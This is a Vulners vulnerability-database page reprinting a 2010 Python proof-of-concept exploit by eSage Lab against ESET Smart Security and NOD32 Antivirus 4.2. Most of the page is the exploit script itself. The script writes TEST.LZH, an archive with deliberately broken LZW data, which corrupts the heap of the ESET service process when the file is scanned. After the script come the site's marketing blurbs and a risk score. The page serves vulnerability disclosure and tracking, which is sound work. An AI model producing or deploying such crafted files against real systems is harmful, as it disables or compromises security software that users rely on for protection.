Vulners
Lucene search
ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) LZH archive parsing PoC Exploit
#
# ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64)
# LZH archive parsing PoC exploit.
#
# Scanning of malicious file causes heap corruption in context
# of the service process (ekrn.exe).
# See Dr. Watson log (drwtsn32.log) for details.
#
# USAGE: python eset_lzh.py (TEST.LZH will be created)
#
# (c) 2010 eSage Lab
# http://www.esagelab.com/
# [email protected]
#
data = (
"\x21" # Size of archived file header
"\x83" # Checksum of remaining bytes
"-lh" # ID
"5" # Compression method (LZW, Arithmetic Encoding)
"-" # ID
"\x13\x00\x00\x00" # Compressed size
"\x30\x00\x00\x00" # Uncompressed size
"\xFB\x3A\x6C\x3B" # Original file date/time
"\x20\x01" # File attribute
"\x08" # File name length
"TEST.TXT" # File name
"\xDC\x41\x4D\x00\x00\x00\x0B\x33\x6D\x66\x49\x5D" # !!! broken LZW compressed data
"\x23\x08\x8A\x78\x00\x00\xC0\x81\xA5\xC0\xD7\x20" #
)
print "ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) LZH File parsing PoC exploit"
print "(c) 2010 eSage Lab"
print "----------------------------"
f = open("TEST.LZH", 'wb')
f.write(data)
f.close()
print "TEST.LZH (%d bytes) created" % len(data)
print "Now try to scan it with antivirus"
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1